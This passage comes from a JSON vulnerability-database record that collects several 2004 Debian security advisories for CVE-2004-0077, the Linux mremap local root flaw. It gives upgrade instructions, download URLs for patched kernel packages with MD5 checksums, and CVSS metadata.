http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.17-mips/mips-tools_2.4.17-0.020226.2.woody5_mipsel.deb\n Size/MD5 checksum: 15114 65e08c5c4f432a537641b6b3a76a3c42\n\n\n These files will probably be moved into the stable distribution on\n its next revision.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "edition": 3, "modified": "2004-02-18T00:00:00", "published": "2004-02-18T00:00:00", "id": "DEBIAN:DSA-441-1:C8D41", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2004/msg00037.html", "title": "[SECURITY] [DSA 441-1] New Linux 2.4.17 packages fix local root exploit (mips+mipsel)", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T02:21:31", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0077"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 514-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nJune 4th, 2004 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : kernel-source-2.2.20, kernel-image-2.2-sparc\nVulnerability : failing function and TLB flush\nProblem-Type : local\nDebian-specific: no\nCVE ID : CAN-2004-0077\nCERT advisory : VU#981222\n\nPaul Starzetz and Wojciech Purczynski of isec.pl discovered a critical\nsecurity vulnerability in the memory management code of Linux inside\nthe mremap(2) system call. Due to flushing the TLB (Translation\nLookaside Buffer, an address cache) too early it is possible for an\nattacker to trigger a local root exploit.\n\nThe attack vectors for 2.4.x and 2.2.x kernels are exclusive for the\nrespective kernel series, though. We formerly believed that the\nexploitable vulnerability in 2.4.x does not exist in 2.2.x which is\nstill true. However, it turned out that a second (sort of)\nvulnerability is indeed exploitable in 2.2.x, but not in 2.4.x, with a\ndifferent exploit, of course.\n\nFor the stable distribution (woody) these problems have been fixed in\nversion 9woody1 of Linux 2.2 kernel images for the sparc architecture\nand in version 2.2.20-5woody3 of Linux 2.2.20 source.\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 9.1 of Linux 2.2 kernel images for the sparc architecture.\n\nThis problem has been fixed for other architectures already.\n\nWe recommend that you upgrade your Linux kernel package.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/k/kernel-source-2.2.20/kernel-source-2.2.20_2.2.20-5woody3.dsc\n Size/MD5 checksum: 661 4eede8cde6013e6660459173dacd8e4e\n http://security.debian.org/pool/updates/main/k/kernel-source-2.2.20/kernel-source-2.2.20_2.2.20-5woody3.diff.gz\n Size/MD5 checksum: 159991 26db63a4af138d5c67c433da29778102\n http://security.debian.org/pool/updates/main/k/kernel-source-2.2.20/kernel-source-2.2.20_2.2.20.orig.tar.gz\n Size/MD5 checksum: 19394649 57c0edf86cb23a5b215db9121c9b3557\n\n http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.2/kernel-image-sparc-2.2_9woody1.dsc\n Size/MD5 checksum: 768 58d7d78f4cc97af50074cafa2322ca7c\n http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.2/kernel-image-sparc-2.2_9woody1.tar.gz\n Size/MD5 checksum: 25540 af1005c87ca491c28108fda2a66efb2c\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/k/kernel-source-2.2.20/kernel-doc-2.2.20_2.2.20-5woody3_all.deb\n Size/MD5 checksum: 1162414 d244e1206d51a785d2a298df8ffbb9e8\n http://security.debian.org/pool/updates/main/k/kernel-source-2.2.20/kernel-source-2.2.20_2.2.20-5woody3_all.deb\n Size/MD5 checksum: 15848780 33170e34a3d4c56e910314be93f0b184\n\n http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.2/kernel-headers-2.2.20-sparc_9woody1_all.deb\n Size/MD5 checksum: 1122094 e5bdced5ca4b46cffec44e531c238a56\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.2/kernel-image-2.2.20-sun4cdm_9woody1_sparc.deb\n Size/MD5 checksum: 1617420 3789f331d7aa2e9c10b3ffee08c82b94\n http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.2/kernel-image-2.2.20-sun4dm-smp_9woody1_sparc.deb\n Size/MD5 checksum: 1653324 e0b6db9b869d1dd51e2a615a0eaef8a1\n http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.2/kernel-image-2.2.20-sun4u_9woody1_sparc.deb\n Size/MD5 checksum: 2023252 50b820b56ed032a532d5e0bbff5f58b1\n http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.2/kernel-image-2.2.20-sun4u-smp_9woody1_sparc.deb\n Size/MD5 checksum: 2066292 9144adfbf2bce6098028b69ee28658b8\n\n\n These files will probably be moved into the stable distribution on\n its next revision.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "edition": 2, "modified": "2004-06-04T00:00:00", "published": "2004-06-04T00:00:00", "id": "DEBIAN:DSA-514-1:B034B", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2004/msg00115.html", "title": "[SECURITY] [DSA 514-1] New Linux 2.2.20 packages fix local root exploit (sparc)", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T02:23:06", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0077"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 453-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nMarch 2nd, 2004 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : kernel-source-2.2.20, kernel-image-2.2.20-i386, kernel-image-2.2.20-reiserfs-i386, kernel-image-2.2.20-amiga, kernel-image-2.2.20-atari, kernel-image-2.2.20-bvme6000, kernel-image-2.2.20-mac, kernel-image-2.2.20-mvme147, kernel-image-2.2.20-mvme16x, kernel-patch-2.2.20-powerpc\nVulnerability : failing function and TLB flush\nProblem-Type : local\nDebian-specific: no\nCVE ID : CAN-2004-0077\n\nPaul Starzetz and Wojciech Purczynski of isec.pl discovered a critical\nsecurity vulnerability in the memory management code of Linux inside\nthe mremap(2) system call. Due to flushing the TLB (Translation\nLookaside Buffer, an address cache) too early it is possible for an\nattacker to trigger a local root exploit.\n\nThe attack vectors for 2.4.x and 2.2.x kernels are exclusive for the\nrespective kernel series, though. We formerly believed that the\nexploitable vulnerability in 2.4.x does not exist in 2.2.x which is\nstill true. However, it turned out that a second (sort of)\nvulnerability is indeed exploitable in 2.2.x, but not in 2.4.x, with a\ndifferent exploit, of course.\n\nFor the stable distribution (woody) this problem has been fixed in\nthe following versions and architectures:\n\n kernel-source-2.2.20 source 2.2.20-5woody3\n kernel-image-2.2.20-i386 i386 2.2.20-5woody5\n kernel-image-2.2.20-reiserfs-i386 i386 2.2.20-4woody1\n kernel-image-2.2.20-amiga m68k 2.20-4\n kernel-image-2.2.20-atari m68k 2.2.20-3\n kernel-image-2.2.20-bvme6000 m68k 2.2.20-3\n kernel-image-2.2.20-mac m68k 2.2.20-3\n kernel-image-2.2.20-mvme147 m68k 2.2.20-3\n kernel-image-2.2.20-mvme16x m68k 2.2.20-3\n kernel-patch-2.2.20-powerpc powerpc 2.2.20-3woody1\n\nFor the unstable distribution (sid) this problem will be fixed soon\nfor the architectures that still ship a 2.2.x kernel package.\n\nWe recommend that you upgrade your Linux kernel package.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/k/kernel-source-2.2.20/kernel-source-2.2.20_2.2.20-5woody3.dsc\n Size/MD5 checksum: 661 4eede8cde6013e6660459173dacd8e4e\n http://security.debian.org/pool/updates/main/k/kernel-source-2.2.20/kernel-source-2.2.20_2.2.20-5woody3.diff.gz\n Size/MD5 checksum: 159991 26db63a4af138d5c67c433da29778102\n http://security.debian.org/pool/updates/main/k/kernel-source-2.2.20/kernel-source-2.2.20_2.2.20.orig.tar.gz\n Size/MD5 checksum: 19394649 57c0edf86cb23a5b215db9121c9b3557\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.20-i386/kernel-image-2.2.20-i386_2.2.20-5woody5.dsc\n Size/MD5 checksum: 808 e0ab6c5a72afc1bb1bf8ac79901aaa10\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.20-i386/kernel-image-2.2.20-i386_2.2.20-5woody5.tar.gz\n Size/MD5 checksum: 14062 dee74cee41726fc43d5e2d2ff765106f\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.20-reiserfs-i386/kernel-image-2.2.20-reiserfs-i386_2.2.20-4woody1.dsc\n Size/MD5 checksum: 763 c8edde803877bdac6c5176892724e6cd\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.20-reiserfs-i386/kernel-image-2.2.20-reiserfs-i386_2.2.20-4woody1.tar.gz\n Size/MD5 checksum: 6341 42bf6d7336c973fa7a782710007c4c0d\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.20-amiga/kernel-image-2.2.20-amiga_2.2.20-4.dsc\n Size/MD5 checksum: 636 9278a7e66394ce2ed88dee9157a55942\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.20-amiga/kernel-image-2.2.20-amiga_2.2.20-4.tar.gz\n Size/MD5 checksum: 3733 4c640cd56182c20882e3fe534ee8685a\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.20-atari/kernel-image-2.2.20-atari_2.2.20-3.dsc\n Size/MD5 checksum: 636 138af6942e118d1171f765e8811cd6ae\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.20-atari/kernel-image-2.2.20-atari_2.2.20-3.tar.gz\n Size/MD5 checksum: 3657 358575286c68dbd0ed01e34902f013eb\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.20-bvme6000/kernel-image-2.2.20-bvme6000_2.2.20-3.dsc\n Size/MD5 checksum: 630 ef185741b10a0453dfed1d174b9cb21a\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.20-bvme6000/kernel-image-2.2.20-bvme6000_2.2.20-3.tar.gz\n Size/MD5 checksum: 3372 85e13320526f3e72b8e480ec2606ea7c\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.20-mac/kernel-image-2.2.20-mac_2.2.20-3.dsc\n Size/MD5 checksum: 630 7eb61d65166a85de5a36c1319f705ace\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.20-mac/kernel-image-2.2.20-mac_2.2.20-3.tar.gz\n Size/MD5 checksum: 3543 f178454597e898c72df8a98f3f48c8eb\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.20-mvme147/kernel-image-2.2.20-mvme147_2.2.20-3.dsc\n Size/MD5 checksum: 627 2ca571f0dc73b19cb4e95832e6b329b2\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.20-mvme147/kernel-image-2.2.20-mvme147_2.2.20-3.tar.gz\n Size/MD5 checksum: 3356 fcec4b45ef27b634742b7e93dce4b8f2\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.20-mvme16x/kernel-image-2.2.20-mvme16x_2.2.20-3.dsc\n Size/MD5 checksum: 627 65e1bd5bec651d976ee05f9b8f4d9b48\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.20-mvme16x/kernel-image-2.2.20-mvme16x_2.2.20-3.tar.gz\n Size/MD5 checksum: 3388 bcdeb01f56e23d6222582fbccf45d0dd\n\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.2.20-powerpc/kernel-patch-2.2.20-powerpc_2.2.20-3woody1.dsc\n Size/MD5 checksum: 724 6678c67a4d8ca5d865fad683b294f1b2\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.2.20-powerpc/kernel-patch-2.2.20-powerpc_2.2.20-3woody1.tar.gz\n Size/MD5 checksum: 19725 e5afc11169cae702f8efbf04827fcf33\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/k/kernel-source-2.2.20/kernel-doc-2.2.20_2.2.20-5woody3_all.deb\n Size/MD5 checksum: 1162414 d244e1206d51a785d2a298df8ffbb9e8\n http://security.debian.org/pool/updates/main/k/kernel-source-2.2.20/kernel-source-2.2.20_2.2.20-5woody3_all.deb\n Size/MD5 checksum: 15848780 33170e34a3d4c56e910314be93f0b184\n\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.2.20-powerpc/kernel-patch-2.2.20-powerpc_2.2.20-3woody1_all.deb\n Size/MD5 checksum: 18658 2f81d9dca6c10e1f41d5e845d5e0f2ce\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.20-i386/kernel-headers-2.2.20_2.2.20-5woody5_i386.deb\n Size/MD5 checksum: 1919670 25ea7ce56e42d74ad5a60009af2e0e8a\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.20-i386/kernel-headers-2.2.20-compact_2.2.20-5woody5_i386.deb\n Size/MD5 checksum: 1868748 8bcbd7573c6b1c53900e1f25f712a612\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.20-i386/kernel-headers-2.2.20-idepci_2.2.20-5woody5_i386.deb\n Size/MD5 checksum: 1840548 7969d01dd04f032627652e29a048f687\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.20-i386/kernel-image-2.2.20_2.2.20-5woody5_i386.deb\n Size/MD5 checksum: 5789366 accfe06e7e38d1d2ef61df381b1710c1\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.20-i386/kernel-image-2.2.20-compact_2.2.20-5woody5_i386.deb\n Size/MD5 checksum: 1623778 befd89e4a89547b696fcb1e3e3d6bd79\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.20-i386/kernel-image-2.2.20-idepci_2.2.20-5woody5_i386.deb\n Size/MD5 checksum: 1284342 c532a46f993cef7f5508d3a98bd2e1e5\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.20-reiserfs-i386/kernel-headers-2.2.20-reiserfs_2.2.20-4woody1_i386.deb\n Size/MD5 checksum: 1898558 fd91d75e0abeb484fafd41542e61a3a3\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.20-reiserfs-i386/kernel-image-2.2.20-reiserfs_2.2.20-4woody1_i386.deb\n Size/MD5 checksum: 1703058 28bed77f45f8a4d10c9843a73200500b\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.20-amiga/kernel-image-2.2.20-amiga_2.2.20-4_m68k.deb\n Size/MD5 checksum: 1533156 ae9b3e8bb75af6072f2558411c600db1\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.20-atari/kernel-image-2.2.20-atari_2.2.20-3_m68k.deb\n Size/MD5 checksum: 1476746 1658fb396b6b6747db6b10a86853493d\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.20-bvme6000/kernel-image-2.2.20-bvme6000_2.2.20-3_m68k.deb\n Size/MD5 checksum: 1318464 662a840f2a2ee4ab20e2306640efc77e\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.20-mac/kernel-image-2.2.20-mac_2.2.20-3_m68k.deb\n Size/MD5 checksum: 1426616 36e90c602170fa88883d9e5711328238\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.20-mvme147/kernel-image-2.2.20-mvme147_2.2.20-3_m68k.deb\n Size/MD5 checksum: 1252288 d98f6ae70e3b76b9edb00851d2fb10fc\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.20-mvme16x/kernel-image-2.2.20-mvme16x_2.2.20-3_m68k.deb\n Size/MD5 checksum: 1323998 b0ae1e8e75af684b293ac92a7eb1b897\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.2.20-powerpc/kernel-headers-2.2.20_2.2.20-3woody1_powerpc.deb\n Size/MD5 checksum: 1860028 077556e58768e51fb3e6215c865c6056\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.2.20-powerpc/kernel-image-2.2.20-chrp_2.2.20-3woody1_powerpc.deb\n Size/MD5 checksum: 3316596 71a3275da4ecd0e0789b3aad8a6ebafd\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.2.20-powerpc/kernel-image-2.2.20-pmac_2.2.20-3woody1_powerpc.deb\n Size/MD5 checksum: 3349730 c8837a83060a41ded41656f6870ba1da\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.2.20-powerpc/kernel-image-2.2.20-prep_2.2.20-3woody1_powerpc.deb\n Size/MD5 checksum: 1772322 b61afa06348d176cfde719d57a86a7ad\n\n\n These files will probably be moved into the stable distribution on\n its next revision.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "edition": 2, "modified": "2004-03-02T00:00:00", "published": "2004-03-02T00:00:00", "id": "DEBIAN:DSA-453-1:4CA6B", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2004/msg00050.html", "title": "[SECURITY] [DSA 453-1] New Linux 2.2.20 packages fix local root exploit (i386+m68k+powerpc)", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-11T13:12:59", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0077"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 444-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nFebruary 20th, 2004 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : kernel-image-2.4.17-ia64\nVulnerability : missing function return value check\nProblem-Type : local\nDebian-specific: no\nCVE ID : CAN-2004-0077\n\nPaul Starzetz and Wojciech Purczynski of isec.pl discovered a critical\nsecurity vulnerability in the memory management code of Linux inside\nthe mremap(2) system call. Due to missing function return value check\nof internal functions a local attacker can gain root privileges.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 011226.16 of ia64 kernel source and images.\n\nOther architectures are or will be mentioned in a separate advisory\nrespectively or are not affected (m68k).\n\nFor the unstable distribution (sid) this problem will be fixed in version\n2.4.24-3.\n\nThis problem is also fixed in the upstream version of Linux 2.4.25 and\n2.6.3.\n\nWe recommend that you upgrade your Linux kernel packages immediately.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-image-2.4.17-ia64_011226.16.dsc\n Size/MD5 checksum: 736 ce2c07cdef967852affbded0c3b87d07\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-image-2.4.17-ia64_011226.16.tar.gz\n Size/MD5 checksum: 25404148 fc05010d0a2597556ade2725bd9964ba\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-source-2.4.17-ia64_011226.16_all.deb\n Size/MD5 checksum: 24735276 62b217b8063eee0e7bcc0dab7cf1d436\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-headers-2.4.17-ia64_011226.16_ia64.deb\n Size/MD5 checksum: 3635878 a80b582cac7154d87a683d3fb26504a9\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-image-2.4.17-itanium_011226.16_ia64.deb\n Size/MD5 checksum: 7019622 55c55179d90f2f65b855a6ae4190cc70\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-image-2.4.17-itanium-smp_011226.16_ia64.deb\n Size/MD5 checksum: 7168586 8f95a26976bcedae6bece27dd60237e1\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-image-2.4.17-mckinley_011226.16_ia64.deb\n Size/MD5 checksum: 7011682 001c6f5ed436bfcd42acbb6d6046b11c\n http://security.debian.org/pool/updates/main/k/kernel-image-2.4.17-ia64/kernel-image-2.4.17-mckinley-smp_011226.16_ia64.deb\n Size/MD5 checksum: 7161374 586b7f6a4912694036df7dfadd4a57ca\n\n\n These files will probably be moved into the stable distribution on\n its next revision.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "edition": 3, "modified": "2004-02-20T00:00:00", "published": "2004-02-20T00:00:00", "id": "DEBIAN:DSA-444-1:58039", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2004/msg00040.html", "title": "[SECURITY] [DSA 444-1] New Linux 2.4.17 packages fix local root exploit (ia64)", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T02:21:19", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0077"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 456-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nMarch 6th, 2004 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : kernel-source-2.2.19, kernel-patch-2.2.19-arm, kernel-image-2.2.19-netwinder, kernel-image-2.2.19-riscpc\nVulnerability : failing function and TLB flush\nProblem-Type : local\nDebian-specific: no\nCVE ID : CAN-2004-0077\n\nPaul Starzetz and Wojciech Purczynski of isec.pl discovered a critical\nsecurity vulnerability in the memory management code of Linux inside\nthe mremap(2) system call. Due to flushing the TLB (Translation\nLookaside Buffer, an address cache) too early it is possible for an\nattacker to trigger a local root exploit.\n\nThe attack vectors for 2.4.x and 2.2.x kernels are exclusive for the\nrespective kernel series, though. We formerly believed that the\nexploitable vulnerability in 2.4.x does not exist in 2.2.x which is\nstill true. However, it turned out that a second (sort of)\nvulnerability is indeed exploitable in 2.2.x, but not in 2.4.x, with a\ndifferent exploit, of course.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 20040303 of 2.2 kernel images for the arm architecture.\n\nFor the unstable distribution (sid) this problem will be fixed soon\nfor the architectures that still ship a 2.2.x kernel package.\n\nWe recommend that you upgrade your Linux kernel package.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://master.debian.org/~joey/stuff/2.2.19/kernel-source-2.2.19_2.2.19.1-4woody1.diff.gz\n Size/MD5 checksum: 164319 b9f8b9f3cb28a280475689c370f0c24f\n http://master.debian.org/~joey/stuff/2.2.19/kernel-source-2.2.19_2.2.19.1-4woody1.dsc\n Size/MD5 checksum: 667 c26b92b6c65d339de908d6e656f042fb\n http://master.debian.org/~joey/stuff/2.2.19/kernel-source-2.2.19_2.2.19.1.orig.tar.gz\n Size/MD5 checksum: 19144159 1537932c835e5a01bc2d6c3087706e30\n\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.2.19-arm/kernel-patch-2.2.19-arm_20040303.dsc\n Size/MD5 checksum: 562 c8e2f35175c7ecba9028db915e37aef4\n http://security.debian.org/pool/updates/main/k/kernel-patch-2.2.19-arm/kernel-patch-2.2.19-arm_20040303.tar.gz\n Size/MD5 checksum: 532339 3b5e94100b2f572db8881b6341bb4757\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.19-netwinder/kernel-image-2.2.19-netwinder_20040303.dsc\n Size/MD5 checksum: 646 1e9e65289a4dc58ccbf9a075833d687a\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.19-netwinder/kernel-image-2.2.19-netwinder_20040303.tar.gz\n Size/MD5 checksum: 17807 2eccf623da43a398117926f5cca26774\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.19-riscpc/kernel-image-2.2.19-riscpc_20040303.dsc\n Size/MD5 checksum: 614 e228e1d3b31b0c4b1abbb792fc4bb781\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.19-riscpc/kernel-image-2.2.19-riscpc_20040303.tar.gz\n Size/MD5 checksum: 16222 ef1e334b6b9bfb274da499f4890060bf\n\n Architecture independent components:\n\n http://master.debian.org/~joey/stuff/2.2.19/kernel-doc-2.2.19_2.2.19.1-4woody1_all.deb\n Size/MD5 checksum: 1101030 58d45db197e8bad9dc95d9b9baf918e8\n http://master.debian.org/~joey/stuff/2.2.19/kernel-source-2.2.19_2.2.19.1-4woody1_all.deb\nhttp://security.debian.org/pool/updates/main/k/kernel-patch-2.2.19-arm/kernel-patch-2.2.19-arm_20040303_all.deb\n Size/MD5 checksum: 536998 1a1055497278f58956750e45c323a3d6\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.19-netwinder/kernel-headers-2.2.19_20040303_arm.deb\n Size/MD5 checksum: 1879720 41e8e0e4b2f0797a1ffecd16d47505a1\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.19-netwinder/kernel-image-2.2.19-netwinder_20040303_arm.deb\n Size/MD5 checksum: 4017076 348d3e5be8f7ee1ac42ee0ad279497db\n\n http://security.debian.org/pool/updates/main/k/kernel-image-2.2.19-riscpc/kernel-image-2.2.19-riscpc_20040303_arm.deb\n Size/MD5 checksum: 1830102 ce66fad5186658470c0ffaf77f822a4c\n\n\n These files will probably be moved into the stable distribution on\n its next revision.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "edition": 2, "modified": "2004-03-06T00:00:00", "published": "2004-03-06T00:00:00", "id": "DEBIAN:DSA-456-1:504C8", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2004/msg00053.html", "title": "[SECURITY] [DSA 456-1] New Linux 2.2.19 packages fix local root exploit (arm)", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T02:21:26", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0077"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 454-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nMarch 2nd, 2004 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : kernel-source-2.2.22, kernel-image-2.2.22-alpha\nVulnerability : failing function and TLB flush\nProblem-Type : local\nDebian-specific: no\nCVE ID : CAN-2004-0077\n\nPaul Starzetz and Wojciech Purczynski of isec.pl discovered a critical\nsecurity vulnerability in the memory management code of Linux inside\nthe mremap(2) system call. Due to flushing the TLB (Translation\nLookaside Buffer, an address cache) too early it is possible for an\nattacker to trigger a local root exploit.\n\nThe attack vectors for 2.4.x and 2.2.x kernels are exclusive for the\nrespective kernel series, though. We formerly believed that the\nexploitable vulnerability in 2.4.x does not exist in 2.2.x which is\nstill true. However, it turned out that a second (sort of)\nvulnerability is indeed exploitable in 2.2.x, but not in 2.4.x, with a\ndifferent exploit, of course.\n\nFor the stable distribution (woody) this problem has been fixed in\nthe following versions and architectures:\n\n kernel-source-2.2.22 source 2.2.22-1woody1\n kernel-image-2.2.22-alpha alpha 2.2.22-2\n\nFor the unstable distribution (sid) this problem will be fixed soon\nfor the architectures that still ship a 2.2.x kernel package.\n\nWe recommend that you upgrade your Linux kernel package.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/k/kernel-source-2.2.22/kernel-source-2.2.22_2.2.22-1woody1.dsc\n Size/MD5 checksum: 661 2f5744d0e7d68932d8910d15583ed820\n 